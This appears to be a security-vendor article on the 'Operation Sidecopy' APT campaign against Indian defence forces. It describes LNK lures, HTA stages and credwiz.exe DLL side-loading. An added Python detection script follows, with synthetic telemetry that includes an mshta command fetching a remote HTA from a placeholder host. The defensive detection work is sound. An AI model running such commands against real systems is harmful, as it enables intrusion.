Seqrite has uncovered a new Advanced Persistent Threat (APT) campaign targeting India’s Defence Forces. Dubbed ‘Operation Sidecopy’, the campaign was found to mislead the security community by copying Tactics, Techniques, and Procedures (TTPs) that point at the Sidewinder APT group. However, Seqrite researchers have found strong evidence that ‘Operation Sidecopy’ has links to the Pakistan-backed Transparent Tribe group. This is a breakthrough discovery, making Seqrite the first cybersecurity brand to expose the real identity of these threat actors.
Following the discovery, Seqrite alerted the Government authorities so that precautionary measures could be taken. Seqrite researchers suspect that China could be leveraging Pakistan-based APT groups to gather intelligence from India that would benefit it in the ongoing India-China conflict. They further warned that these attacks put intelligence agencies at risk of losing sensitive information that could be leveraged by both neighbouring countries, either directly through data exfiltration or indirectly by compromising an individual and compelling them to share confidential data.
Active since early 2019, ‘Operation Sidecopy’ has used infection vectors such as LNK files, template injection, and the Microsoft Equation Editor vulnerability to target Indian defence forces. For command and control it has used Contabo GmbH, the hosting provider most commonly favoured by Transparent Tribe. According to Seqrite researchers, the actors have continuously developed their malware modules and deployed updated versions after analysing the victim’s data and environment. Notably, the attackers also tracked which of their malware samples were detected by the victim’s antivirus and replaced them immediately, leaving little trace for further investigation.
Uncovering the attack
A couple of months ago, Seqrite’s next-generation behavioural detection technology alerted on a few processes running executable HTML (HTA) files fetched from low-reputation websites. In addition, the researchers noticed that the files involved had interesting names such as “Defence Production Policy 2020.docx.lnk”. Taken together, these factors triggered a deeper investigation, which found that the attacks were targeted at Indian defence units and individuals in the armed forces.
The attack starts with the victim receiving an LNK file inside a compressed ZIP or RAR archive attached to a phishing email. Because these files carry realistic names and icons, appearing to come directly from the Government of India, victims are likely to take them as authentic and be tricked into opening them.
Once opened, the malware runs in memory and gradually downloads and installs further components, eventually stealing user data and uploading it to attacker-controlled servers. The attack used DLL side-loading (also known as the ‘Black-White’ technique): a legitimate, Microsoft-signed system binary, credwiz.exe, was abused to load and run the malicious DLL. After gaining a foothold on the victim’s machine, the malware immediately restarts the device to clear traces of the initial infection.
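The chain described above (a document-lookalike LNK dropped from an archive, an HTA stage, and credwiz.exe side-loading a DLL) leaves a recognisable trail in endpoint telemetry. The following is an added example of detection logic for that trail; it is not Seqrite’s code and not part of the original article. The event records are constructed here in a simplified Sysmon-like shape (EventID 11 file create, EventID 1 process create, EventID 7 image load); the field names follow Sysmon, while the user, paths, DLL name and URL are placeholders. The assumption that the attacker runs a copied credwiz.exe from a user-writable directory is the author’s illustration, not something the article states.

```python
"""Detection heuristics for an LNK -> HTA -> credwiz.exe side-loading chain.

Added example, not Seqrite's code. Records are constructed in a simplified
Sysmon-like shape (EventID 11 file create, EventID 1 process create, EventID 7
image load); field names follow Sysmon, the values are synthetic.
"""
import re
from typing import Dict, List

# ".docx.lnk"-style names: a shortcut dressed up as a document.
DOUBLE_EXT_LNK = re.compile(r"\.(?:docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Signed Microsoft binaries used as side-loading hosts; credwiz.exe is the one
# named in the article.
SIDELOAD_HOSTS = {"credwiz.exe"}
# Where the genuine copies of those binaries, and the DLLs they import, live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_system_path(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def check_file_create(ev: Dict) -> List[str]:
    """EventID 11: an archive tool or browser dropping the lure on disk."""
    name = basename(ev.get("TargetFilename", ""))
    return ["double-extension LNK lure"] if DOUBLE_EXT_LNK.search(name) else []


def check_process_create(ev: Dict) -> List[str]:
    """EventID 1: the HTA stage, and a side-load host running from the wrong place."""
    hits = []
    image_path = ev.get("Image", "")
    image = basename(image_path)
    # mshta.exe rarely takes a URL on the command line in normal use.
    if image == "mshta.exe" and REMOTE_URL.search(ev.get("CommandLine", "")):
        hits.append("mshta.exe executing remote HTA")
    # Assumption for illustration: the attacker copies credwiz.exe next to a
    # malicious DLL in a user-writable directory. The real binary is in System32.
    if image in SIDELOAD_HOSTS and not is_system_path(image_path):
        hits.append(f"{image} running outside System32")
    return hits


def check_image_load(ev: Dict) -> List[str]:
    """EventID 7: a side-load host resolving one of its DLLs from a non-system path."""
    image = basename(ev.get("Image", ""))
    loaded = ev.get("ImageLoaded", "")
    if image in SIDELOAD_HOSTS and not is_system_path(loaded):
        return [f"{image} loaded DLL from non-system path: {basename(loaded)}"]
    return []


RULES = {11: check_file_create, 1: check_process_create, 7: check_image_load}


def scan(events: List[Dict]) -> List[Dict]:
    """Run every applicable rule over the event stream; one finding per hit."""
    findings = []
    for ev in events:
        for rule in RULES.get(ev.get("EventID"), lambda _: [])(ev):
            findings.append({"EventID": ev["EventID"], "Image": ev.get("Image", ""), "rule": rule})
    return findings


# Constructed sample telemetry (not real logs) following the chain in the article.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "TargetFilename": "C:\\Users\\u\\Downloads\\Defence Production Policy 2020.docx.lnk"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/stage.hta"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "Image": "C:\\Users\\u\\AppData\\Roaming\\credwiz.exe", "CommandLine": "credwiz.exe"},
    {"EventID": 7, "Image": "C:\\Users\\u\\AppData\\Roaming\\credwiz.exe",
     "ImageLoaded": "C:\\Users\\u\\AppData\\Roaming\\lib.dll"},
    # Benign baseline: the genuine credwiz.exe loading a system DLL, and a plain document.
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\credwiz.exe", "CommandLine": "credwiz.exe"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\credwiz.exe",
     "ImageLoaded": "C:\\Windows\\System32\\duser.dll"},
    {"EventID": 11, "Image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "TargetFilename": "C:\\Users\\u\\Downloads\\report.docx"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[EventID {f['EventID']}] {f['rule']}  ({f['Image']})")
```

Run against the constructed stream, the four malicious events each produce one finding and the three benign baseline events produce none. The image-load rule is the most robust of the set: it fires whenever a known side-load host resolves one of its DLLs from outside the system directories, regardless of where the host binary itself was started from.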